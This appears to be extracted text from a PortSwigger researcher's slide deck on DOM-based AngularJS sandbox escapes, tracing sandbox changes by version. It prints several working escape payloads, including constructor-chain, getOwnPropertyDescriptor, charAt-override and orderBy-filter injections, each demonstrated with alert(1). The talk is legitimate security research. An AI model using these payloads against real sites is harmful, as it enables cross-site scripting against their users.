DOM Angular Sandbox escapes.key - PortSwigger

Download PDF
15 downloads 380 Views 3MB Size Report
Comment
I'm a researcher at PortSwigger. • I love hacking JavaScript & browsers. Array.from([1],alert). • Follow me on t
DOM based Angular sandbox escapes

About me • I’m a researcher at PortSwigger • I love hacking JavaScript & browsers Array.from([1],alert) • Follow me on twitter @garethheyes

No sandbox • Angular 1.0 - 1.1.5 didn’t have a sandbox • But expressions were scoped to an object
 e.g. alert(1) becomes ({}).alert(1) • Mario Heiderich discovered expressions could execute arbitrary code

constructor.constructor('alert(1)')()

Basic sandbox • Angular 1.2.0 introduced a basic sandbox

function ensureSafeMemberName(name, fullExpression, allowConstructor) { if (name === "constructor" && !allowConstructor) { throw … } if (name.charAt(0) === '_' || name.charAt(name.length-1) === '_') { throw … } return name; }

First sandbox escape • Jan Horn found the first sandbox escape for 1.2.0

{{a='constructor'; b={}; a.sub.call.call(b[a].getOwnPropertyDescriptor(b[ a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Sandbox improvement • Angular improved their sandbox

function ensureSafeMemberName(name, fullExpression) { if (name === "__defineGetter__" || name === "__defineSetter__" || name === "__lookupGetter__" || name === "__lookupSetter__" || name === "__proto__") { throw … } return name; }

Sandbox improvement function ensureSafeObject(obj, fullExpression) { if (obj) { if (obj.constructor === obj) { throw … } else if (obj.window === obj) { throw … } else if (obj.children && (obj.nodeName || (obj.prop && obj.attr && obj.find))) { throw … } else if (obj === Object) { throw … } } return obj; }

Sandbox party • We had a party and me, Jan Horn, Mathias Karlsson, Gábor Molnár and Ian Hickey all broke the sandbox • http://blog.portswigger.net/2016/01/xss-without-htmlclient-side-template.html

{{'a'.constructor.prototype.charAt=[].join; $eval('x=1} } };alert(1)//');}}

Sandbox removed • Angular removed the sandbox in version 1.6 • Is the fun over? • What about another context?

Order by filter • Lewis Ardern mentioned that angular executes expressions order by filter • https://blogs.synopsys.com/software-integrity/2016/12/28/ angularjs-1-6-0-sandbox/

$scope.orderby = unescape(location.hash.slice(1)); ….ng-repeat= friend in friends | orderBy:orderby • Used for sorting >test test

Thanks • Mario Heiderich, Jan Horn, Mathias Karlsson, Gábor Molnár, Ian Hickey and Lewis Ardern • PortSwigger • Can you find an exploit for >1.5.8?

The end Questions?